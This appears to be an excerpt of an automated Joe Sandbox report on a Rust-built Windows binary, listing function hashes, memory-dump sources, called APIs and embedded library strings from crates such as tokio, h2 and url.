                • API String ID:
                • Opcode ID: c3cc16cd4057371b8316ae76c64e2ef911c356c9645c6bf3f30278fe0dd93fa1
                • Instruction ID: 402adba7618f95215929ca35de81b8a23bbb9ac1ebe741c2bc5bee2238a482b0
                • Opcode Fuzzy Hash: c3cc16cd4057371b8316ae76c64e2ef911c356c9645c6bf3f30278fe0dd93fa1
                • Instruction Fuzzy Hash: B6012D21F18A5141FB669921A950BFA5561FF217A8F8460B3DD0E17A84DE3499289310
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a0251260e76a74651e5868f7c8dc76e521ae6ae4722ccc1664a98ba960f82a64
                • Instruction ID: a3794662df550f07991de5908a4627441c8b5e6cfb2a291ad3662dd6efeb3f29
                • Opcode Fuzzy Hash: a0251260e76a74651e5868f7c8dc76e521ae6ae4722ccc1664a98ba960f82a64
                • Instruction Fuzzy Hash: 37E0ECCB60FBE455E3135A3D155405CAF14855AE9935D85E5D3A703363D40E100BD221
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 5a7722c4cc2d16d9f2781eaec9208819a5f0d3889639685444df4ce7b1efc849
                • Instruction ID: b9efa45d390367d7cf382ea71a4cb4bed12747ca7ff139218230b19134ff65f7
                • Opcode Fuzzy Hash: 5a7722c4cc2d16d9f2781eaec9208819a5f0d3889639685444df4ce7b1efc849
                • Instruction Fuzzy Hash: 9CF13E22608E8180FB61EF21E4543FEA764FB45B98F844076DE8D4B69ADF78D25DC720
                APIs
                Strings
                • Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A7FBE87
                • polling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs, xrefs: 00007FF71A7FBE9F
                • internal error: entered unreachable codemid > len, xrefs: 00007FF71A7FBE4B
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$SwitchThread
                • String ID: Map must not be polled after it returned `Poll::Ready`$internal error: entered unreachable codemid > len$polling StreamFuture twice/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/stream/stream/into_future.rs
                • API String ID: 3101437787-3501928663
                • Opcode ID: 33edb968f592a0e241f94e017698f6b584fe721b748f08ef977bac56680562b1
                • Instruction ID: 6d1983c548e2bde8376175c3d0c70688f56c0061d14f444e73491d7320460363
                • Opcode Fuzzy Hash: 33edb968f592a0e241f94e017698f6b584fe721b748f08ef977bac56680562b1
                • Instruction Fuzzy Hash: C1916026608E8385FA35EF24A4553FAE750EB89760F840072CBAE43685DE3CE74DC721
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: assertion failed: stream.state.is_closed()$received unexpected shutdown ping
                • API String ID: 3510742995-1082630576
                • Opcode ID: fd696f8b28372cf358e084e5256b195eeac5139d8d1246e25c3745721f9982e7
                • Instruction ID: a72660883e42c93ff42dcca0f95f40bbcc2e75d148cfce2c7a3670354633fe3f
                • Opcode Fuzzy Hash: fd696f8b28372cf358e084e5256b195eeac5139d8d1246e25c3745721f9982e7
                • Instruction Fuzzy Hash: 44123476608BC18AE7719B14E4503EAB7A0FB89794F904066DBCC43B9ADF7CD199CB10
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: //file://$:/.$:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$assertion failed: !self.serialization[scheme_end_as_usize..].starts_with("://")$assertion failed: self.is_char_boundary(idx)$assertion failed: self.is_char_boundary(n)
                • API String ID: 3510742995-1936055137
                • Opcode ID: 7fddd0a2bf4640576e08de3d0d176cf470f0fea184d42d0e965c7c21cc44d57e
                • Instruction ID: 9a532cd357487c153786a9b53d106ca44a6292ab2812c027d01ddedd7c2dd084
                • Opcode Fuzzy Hash: 7fddd0a2bf4640576e08de3d0d176cf470f0fea184d42d0e965c7c21cc44d57e
                • Instruction Fuzzy Hash: 4BF18F62A08B8196EB12FB11E4442AAF770FB49BA4F804477EE8D03B55DF3CE569C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLast$EnvironmentVariable
                • String ID: internal error: entered unreachable codemid > len
                • API String ID: 2691138088-2258328430
                • Opcode ID: 99b3d555136728d2b9a80d6cad5f7a918c852b0bf213e167f84a7214bfc2509b
                • Instruction ID: ed4f5a55499506f214fa47b42f0c89f000c6268bdb5aca8b6f1d6b0a010674c9
                • Opcode Fuzzy Hash: 99b3d555136728d2b9a80d6cad5f7a918c852b0bf213e167f84a7214bfc2509b
                • Instruction Fuzzy Hash: 3491B062A04F8649FB26AE21D8493F9E354FB44BA8F844176CF5D1B785CF3CD6998320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddrFreeInfo
                • String ID: $assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                • API String ID: 3780557530-2757504381
                • Opcode ID: aef8258499686c2091064c0ceaa1db99f0bb354569fb63fcaa378d05e82e2aba
                • Instruction ID: 7593a94d6234ace46967410dd1b41f012d6ba903fbf97d3622130e9ada6c8d0f
                • Opcode Fuzzy Hash: aef8258499686c2091064c0ceaa1db99f0bb354569fb63fcaa378d05e82e2aba
                • Instruction Fuzzy Hash: CEA19D72A04A51CAF719EF21D4406ADBBB1FB88B64F95803ACE0D43B94DF38D959C760
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLastPerformanceQuery$CounterFrequency
                • String ID: called `Result::unwrap()` on an `Err` value
                • API String ID: 2984914903-2333694755
                • Opcode ID: 36da2e6101111a600268ef61ff68cd1b9bccb5635c7a8a57596443dfe861ad14
                • Instruction ID: fb4666fa92d95ed4104b7b749f7dea75f20f769803df68bc8f5a0a78c5a597b9
                • Opcode Fuzzy Hash: 36da2e6101111a600268ef61ff68cd1b9bccb5635c7a8a57596443dfe861ad14
                • Instruction Fuzzy Hash: D131C261B09F4656FB06BB6198153B9E366AF847A4F8485B3DC0E07795DE2CA22DC320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: PRI * HTTP/2.0SM
                • API String ID: 3510742995-1997477056
                • Opcode ID: 036492a1f8280a470d712cbdebeb994a49540112b561d17f373ac61e4f69e52b
                • Instruction ID: 87877c809a3cdd656eb600141b442899eed57ab8bf1e67037a96dd0fc2e1fecb
                • Opcode Fuzzy Hash: 036492a1f8280a470d712cbdebeb994a49540112b561d17f373ac61e4f69e52b
                • Instruction Fuzzy Hash: E4328732608BC88AE3A2CF14E5447EEB3A8FB48754F414226EB9C47795DF38D699C710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 8f87efd90b42e2fa175b9ea960ddfe188d8b8a6d45a6f1f64f61315f33a8427a
                • Instruction ID: 5f05a29da4a0fbd5537aeb77e7e33ac0c1c4d5e6ab689facd948589c45868746
                • Opcode Fuzzy Hash: 8f87efd90b42e2fa175b9ea960ddfe188d8b8a6d45a6f1f64f61315f33a8427a
                • Instruction Fuzzy Hash: C1E1672260CBC089E771AB14E4513EAE7A0FB997A4F844136DBC943B9ADF7CD158CB10
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: assertion failed: slot.next.is_none()$invalid key
                • API String ID: 3510742995-195781097
                • Opcode ID: c4865feea41da582d4a0ad7a4561813723ed851027faf8fc1343614b94df602a
                • Instruction ID: de71863d57e21627f168c69653e8f89783334cea7e6b0a5b9573e79182d467bf
                • Opcode Fuzzy Hash: c4865feea41da582d4a0ad7a4561813723ed851027faf8fc1343614b94df602a
                • Instruction Fuzzy Hash: 5731AE62619F5680F711AF01E8457A9FBA4EB587A4F854072EE5C06395DF3CD299C310
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorFrequencyLastPerformanceQuery
                • String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                • API String ID: 3362413890-1633623230
                • Opcode ID: 68bcbc8a747c15da249fd3749a2c230639f94644f5b9c4b602472c525d9dca89
                • Instruction ID: 98031e6bc6ba664a204a45e99da2229bd15fe0312ec333526db4943f9672ca4f
                • Opcode Fuzzy Hash: 68bcbc8a747c15da249fd3749a2c230639f94644f5b9c4b602472c525d9dca89
                • Instruction Fuzzy Hash: 38513525F18F9655FF16EB649814BB9A3A1EF447A4FC48077DD0E06B84DE3CA62DC210
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %2e%2e%2e%2E%2E%2e%2E%2E%2e.%2E..%2e.%2E%2e%2E$...$assertion failed: self.is_char_boundary(at)
                • API String ID: 3510742995-3370502713
                • Opcode ID: 0e5834a28651a47ec7cef9927bb35ec6add74a2ae0405a0ca4a0b7223e0e0a41
                • Instruction ID: d344dcbe3e191d605f86361628a39e50ed248637594e70177beced5018d44be7
                • Opcode Fuzzy Hash: 0e5834a28651a47ec7cef9927bb35ec6add74a2ae0405a0ca4a0b7223e0e0a41
                • Instruction Fuzzy Hash: 70F19351A08E4242FF66BB22A4002B9E771BF45BE4F8484B7DD9D17B95CE3CE569C320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: User-Agent: Proxy-Authorization:
                • API String ID: 3510742995-2999785893
                • Opcode ID: e7324ca3d32987450859dd1dcf19cccfa9f0070ac42184a5acf4efe8fa37d735
                • Instruction ID: 00a86fb26b7b3fa07e526ea7e4eef64e35ac85cde97d88278b218279471f9956
                • Opcode Fuzzy Hash: e7324ca3d32987450859dd1dcf19cccfa9f0070ac42184a5acf4efe8fa37d735
                • Instruction Fuzzy Hash: 20E14962908FC180F751EF24E4453EA6764FB99B58F885176DE8C0B29ADF78D29CC321
                APIs
                Strings
                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A8060D8, 00007FF71A8062C1
                • assertion failed: self.remote.is_none()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/proto/settings.rs, xrefs: 00007FF71A805E28
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: assertion failed: self.remote.is_none()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/proto/settings.rs$called `Result::unwrap()` on an `Err` value
                • API String ID: 3510742995-4259729860
                • Opcode ID: 5ecf74400a5fc2b056764a77dd5a3b95d428bf3479c77432a750ed4e4e05e699
                • Instruction ID: 10a3aee84199b76199bde0cb8335127b994e4276090e72a68a4ddb08fe137a0c
                • Opcode Fuzzy Hash: 5ecf74400a5fc2b056764a77dd5a3b95d428bf3479c77432a750ed4e4e05e699
                • Instruction Fuzzy Hash: F4B1323660DBC18AE3329B54A4503EAFBA4F799750F804066DACC53B59DB3CD258CF20
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: called `Result::unwrap()` on an `Err` value$scheme and authority is valid Uri
                • API String ID: 3510742995-1220905182
                • Opcode ID: e5b837c718ab1e0187bd76501668d7f0adfad1d0585fdce0d91f0cc734ae3ee7
                • Instruction ID: 35a9671c09a0b37f8d7a8eeff11726cbdb9caa3305dda20f0b498f1a0f0f8d96
                • Opcode Fuzzy Hash: e5b837c718ab1e0187bd76501668d7f0adfad1d0585fdce0d91f0cc734ae3ee7
                • Instruction Fuzzy Hash: AE616122A1DEC291F721AB54E0113EAFB60EB99764F844062DBCD13A5ADF7CD29DC710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs$connection closed
                • API String ID: 0-3713214761
                • Opcode ID: f3a5c731c006a358b9f174e7d4dd913e420b50a4da7d32493c2f15c1bb6e881c
                • Instruction ID: b7684dd9f9eb1b3cb59cab39fec9ef5a53658208a88ecd2b1abe9711d57e659a
                • Opcode Fuzzy Hash: f3a5c731c006a358b9f174e7d4dd913e420b50a4da7d32493c2f15c1bb6e881c
                • Instruction Fuzzy Hash: C3416072B08A4252FB16AE2594157F99651FB497B8FC44473EE4D0B295CF3CD68EC320
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                • String ID:
                • API String ID: 1956605914-0
                • Opcode ID: b5d42ead7e69e10bd585d4231131c02bede2e5f35bcca0d4bc676abac4e54aa7
                • Instruction ID: 36c9c562d270531345b0f9c975c0aa730b627427162ad013d50a48dd6164b69c
                • Opcode Fuzzy Hash: b5d42ead7e69e10bd585d4231131c02bede2e5f35bcca0d4bc676abac4e54aa7
                • Instruction Fuzzy Hash: 1F41E661E08AA246F7366650C8087F9D651FB043B4F844273EA8D47BC9FF7CD569C220
                APIs
                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A530
                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A59A
                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A5A7
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: Value
                • String ID:
                • API String ID: 3702945584-0
                • Opcode ID: fd07a03da2fca46eadde4b9de248192e19d8364d25695feb229207d59d8b3d94
                • Instruction ID: 4e0e684a624f7371b105d987e46b605fb20109b52336f1dfe9a24be15a190211
                • Opcode Fuzzy Hash: fd07a03da2fca46eadde4b9de248192e19d8364d25695feb229207d59d8b3d94
                • Instruction Fuzzy Hash: 1721D472B08E0146FB127B5196003B8D361BF49BA0FC541B2DE5D1B795DE2DA9698350
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: invalid key
                • API String ID: 3510742995-3396617187
                • Opcode ID: b4d1b7904d7ccca162cf8eec577f31fc8eaad3fc3f68a475d286f4db4c560adf
                • Instruction ID: faae9ae6bf575ab55f17ed78a246b99eac4e0f7c96bae1dcfdd99112cd0e8c0d
                • Opcode Fuzzy Hash: b4d1b7904d7ccca162cf8eec577f31fc8eaad3fc3f68a475d286f4db4c560adf
                • Instruction Fuzzy Hash: DE219F72608A5291EB21EB11E455BEDA760F7497A4FC48472DE4C07685CF3CD65EC710
                APIs
                • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000006C,?), ref: 00007FF71A7C807B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: SwitchThread
                • String ID: assertion failed: (*tail).value.is_none()$called `Result::unwrap()` on an `Err` value
                • API String ID: 115865932-4033815473
